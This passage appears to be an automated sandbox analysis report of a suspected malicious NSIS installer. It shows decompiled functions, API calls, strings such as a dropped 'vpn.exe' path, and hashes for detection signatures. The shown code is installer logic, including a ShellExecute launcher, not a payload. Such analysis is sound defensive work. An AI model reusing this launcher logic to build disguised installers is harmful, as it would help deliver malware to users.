					 *((intOrPtr*)(__ebp - 0x10)) = E0040145C(__edx, __ebx);
				}
				if( *((intOrPtr*)(_t31 - 0x28)) != _t23) {
					 *(_t31 - 0x14) = E0040145C(_t26, 0x11);
				}
				if( *((intOrPtr*)(_t31 - 0x1c)) != _t23) {
					 *(_t31 + 8) = E0040145C(_t26, 0x22);
				}
				_t24 = E0040145C(_t26, 0xffffffcd);
				_push(_t24);
				_push(0x4140f8);
				_push(0x4100f0);
				E004062CF(L"WriteINIStr: wrote [%s] %s=%s in %s", L"\"C:\\Users\\alfons\\AppData\\Local\\Temp\\New Feature\\vpn.exe\"");
				_t16 = WritePrivateProfileStringW( *(_t31 - 0x10),  *(_t31 - 0x14),  *(_t31 + 8), _t24);
				_t37 = _t16;
				if(_t37 == 0) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00402713
0x0040271e
0x00402721
0x00402724
0x00402727
0x00402733
0x0040273b
0x00402743
0x00402743
0x00402749
0x00402752
0x00402752
0x00402758
0x00402761
0x00402761
0x0040276b
0x0040276d
0x0040276e
0x0040276f
0x0040277a
0x0040278c
0x00401a0b
0x00401a0d
0x00401a13
0x00401a13
0x004030e6
0x004030f2

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

"C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe", xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe"$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-2852534835
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405073, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Section: "%s", xrefs: 004050A5
Skipping section: "%s", xrefs: 004050E1

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Uniqueness

Uniqueness Score: -1.00%

Function 004020F9, Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004020F9() {
				void* __esi;
				signed int _t8;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t26;
				void* _t28;
				void* _t30;

				_push(0x48);
				_push(GetDeviceCaps(GetDC( *(_t30 - 0xc)), 0x5a));
				_t20 = 2;
				_t8 = MulDiv(E00401446(_t20), ??, ??);
				_t21 = 3;
				0x420110->lfHeight =  ~_t8;
				 *0x420120 = E00401446(_t21);
				_t11 =  *((intOrPtr*)(_t30 - 0x1c));
				 *0x420124 = _t11 & 0x00000001;
				 *0x420125 = _t11 & 0x00000002;
				 *0x420126 = _t11 & 0x00000004;
				 *0x420127 = 1;
				E00406831(_t18, _t26, _t28, 0x42012c,  *((intOrPtr*)(_t30 - 0x28)));
				_t14 = CreateFontIndirectW(0x420110);
				_push(_t14);
				_push(_t28);
				E00405F7D();
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004020f9
0x0040210d
0x00402110
0x00402117
0x00402121
0x00402122
0x0040212f
0x00402134
0x0040213c
0x0040214e
0x00402154
0x00402159
0x00402160
0x0040216a
0x004030dc
0x004030dd
0x004030de
0x004030e6
0x004030f2

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424E27,7519EA30,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Uniqueness

Uniqueness Score: -1.00%

Function 00407224, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407224(void* __eflags, WCHAR* _a4, WCHAR* _a8, int _a12) {
				short _v8;
				short _v24;
				char _v264;
				char _v280;
				void* _t20;
				WCHAR* _t22;

				_t20 = E00406EFE(_a4, 5,  &_v280, 0x80);
				if(_t20 == 1) {
					_t22 =  &_v280;
					lstrcpynW( &_v24, _t22, 9);
					_v8 = 0;
					if(lstrcmpW( &_v24, L"Version ") == 0) {
						_t22 =  &_v264;
					}
					lstrcpynW(_a8, _t22, _a12);
				}
				return _t20;
			}

0x00407244
0x0040724c
0x00407256
0x00407265
0x00407269
0x0040727e
0x00407280
0x00407280
0x0040728d
0x00407290
0x00407295

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Uniqueness

Uniqueness Score: -1.00%

Function 004032D2, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004032D2(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42c170; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x47eb00;
						if(_t2 >  *0x47eb00) {
							_t3 = CreateDialogParamW( *0x47eab8, 0x6f, 0, E0040324C, 0);
							 *0x42c170 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040635E(0);
					}
				} else {
					_t6 =  *0x42c170; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42c170 = 0;
					return _t6;
				}
			}

0x004032d9
0x004032f3
0x004032f9
0x00403303
0x00403309
0x0040330f
0x00403320
0x00403329
0x00000000
0x0040332e
0x00403335
0x004032fb
0x00403302
0x00403302
0x004032db
0x004032db
0x004032e2
0x004032e5
0x004032e5
0x004032eb
0x004032f2
0x004032f2

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32 ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Uniqueness

Uniqueness Score: -1.00%

Function 004048F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004048F8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x461dc8 != _t22) {
							 *0x461dc8 = _t22;
							E00406035(0x451d98, 0x47f000);
							E00405F7D(0x47f000, _t22);
							E0040141D(6);
							E00406035(0x47f000, 0x451d98);
						}
						L11:
						return CallWindowProcW( *0x441d58, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E0040487A(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403DDB(0x413);
				return 0;
			}

0x00404904
0x00404929
0x00404949
0x0040494c
0x0040494f
0x00404966
0x0040496c
0x00404973
0x0040497a
0x00404981
0x00404986
0x0040498c
0x00000000
0x0040499c
0x00404936
0x00404989
0x00404989
0x00000000
0x00404989
0x00404942
0x00404944
0x00000000
0x00404944
0x0040490a
0x00000000
0x00000000
0x00404911
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004021B5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004021B5() {
				void* __ebx;
				void* _t20;
				short* _t21;
				void* _t23;
				signed int _t24;
				void* _t28;

				_t26 = E0040145C(_t23, _t20);
				_t21 = E0040145C(_t23, 0x31);
				_t24 = E0040145C(_t23, 0x22);
				E0040145C(_t23, 0x15);
				E00404F9E(0xffffffec, 0x4100f0);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteW( *(_t28 - 0xc),  ~( *_t5 & 0x0000ffff) & _t26, _t21,  ~( *_t24 & 0x0000ffff) & _t24, 0x4d70b0,  *(_t28 - 0x20)) >= 0x21) {
					_push(_t24);
					_push(_t21);
					E004062CF(L"ExecShell: success (\"%s\": file:\"%s\" params:\"%s\")", _t26);
				} else {
					__eax = E004062CF(L"ExecShell: warning: error (\"%s\": file:\"%s\" params:\"%s\")=%d", __esi);
					 *((intOrPtr*)(_t28 - 4)) = 1;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x004021bd
0x004021c6
0x004021cf
0x004021d1
0x004021dd
0x004021ea
0x004021f9
0x0040220b
0x00402223
0x00402224
0x0040222b
0x0040220d
0x00402216
0x00401a13
0x00401a13
0x004030e6
0x004030f2

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424E27,7519EA30,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424E27,7519EA30,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 77f26b720b035cc1d1ae70db398a147a7eca8c0ace956760cbb48242764747f2
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 77f26b720b035cc1d1ae70db398a147a7eca8c0ace956760cbb48242764747f2
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Uniqueness

Uniqueness Score: -1.00%

Function 00402175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 115d5cf8296166f4bed88cdd4bd72efa56e73727d028c006a3be6fa76125f0e9
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 115d5cf8296166f4bed88cdd4bd72efa56e73727d028c006a3be6fa76125f0e9
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Uniqueness

Uniqueness Score: -1.00%

Function 00402797, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402797() {
				short _t7;
				intOrPtr _t8;
				WCHAR* _t9;
				WCHAR* _t10;
				int _t15;
				void* _t21;
				WCHAR* _t24;
				void* _t26;

				_t7 =  *L"!N~"; // 0x4e0021
				 *(_t26 - 0x48) = _t7;
				_t8 =  *0x409590; // 0x7e
				 *((intOrPtr*)(_t26 - 0x44)) = _t8;
				_t9 = E0040145C(_t21, 1);
				_t10 = E0040145C(_t21, 0x12);
				GetPrivateProfileStringW(_t9, _t10, _t26 - 0x48, _t24, 0x2003, E0040145C(_t21, 0xffffffdd));
				_t15 = lstrcmpW(_t24, _t26 - 0x48);
				if(_t15 == 0) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
					 *_t24 = 0;
				}
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x00402797
0x0040279c
0x0040279f
0x004027a6
0x004027a9
0x004027b2
0x004027cd
0x004027d8
0x004019e6
0x004019ee
0x004019f5
0x004019f5
0x004030e6
0x004030f2

APIs

GetPrivateProfileStringW.KERNEL32 ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Uniqueness

Uniqueness Score: -1.00%

Function 004062CF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062CF(WCHAR* _a4, char _a8) {

				 *0x46d220 = 0;
				wvsprintfW(0x46d220 + lstrlenW("RMDir: RemoveDirectory("C:\Users\alfons\AppData\Local\Temp\nsg8FBB.tmp\")") * 2, _a4,  &_a8);
				return E00406113( &_a8, 0);
			}

0x004062d6
0x004062f3
0x00406300

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\"), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\")
API String ID: 3509786178-2589849158
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE2, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DE2(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t11;
				int _t13;
				int _t14;
				CHAR* _t16;
				CHAR* _t26;

				_t11 = lstrlenA(_a8);
				_t26 = _a4;
				_v8 = _t11;
				while(lstrlenA(_t26) >= _v8) {
					_t13 = _v8;
					 *((char*)(_t13 + _t26)) = 0;
					_t14 = lstrcmpiA(_t26, _a8);
					_t26[_v8] =  *((intOrPtr*)(_t13 + _t26));
					if(_t14 == 0) {
						_t16 = _t26;
					} else {
						_t26 = CharNextA(_t26);
						continue;
					}
					L5:
					return _t16;
				}
				_t16 = 0;
				goto L5;
			}

0x00405df2
0x00405df4
0x00405df7
0x00405e23
0x00405dfc
0x00405e06
0x00405e0a
0x00405e15
0x00405e18
0x00405e34
0x00405e1a
0x00405e21
0x00000000
0x00405e21
0x00405e2d
0x00405e31
0x00405e31
0x00405e2b
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 4.exe PID: 2876 Parent PID: 5520 4.exeCOMMON

Executed Functions

Function 00438A70, Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 270timememorystringCOMMON

Download Yara Rule

APIs

GetCompressedFileSizeW.KERNEL32(00000000,?,03DA2008,00000001,?,?), ref: 00438AA6
GetConsoleAliasesW.KERNEL32(?,00000000,00000000,?,?), ref: 00438ABE
GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00438AC8
GlobalFindAtomW.KERNEL32(00000000), ref: 00438ACF
DisconnectNamedPipe.KERNEL32(?,?,?), ref: 00438ADE
AddAtomA.KERNEL32(00000000), ref: 00438AE5
GlobalUnWire.KERNEL32(00000000), ref: 00438AEC
GetModuleHandleExW.KERNEL32(00000000,00000000,?,?,?), ref: 00438B05
GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?), ref: 00438B1A
GetCurrentProcessId.KERNEL32(?,?), ref: 00438B2C
LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00438B44
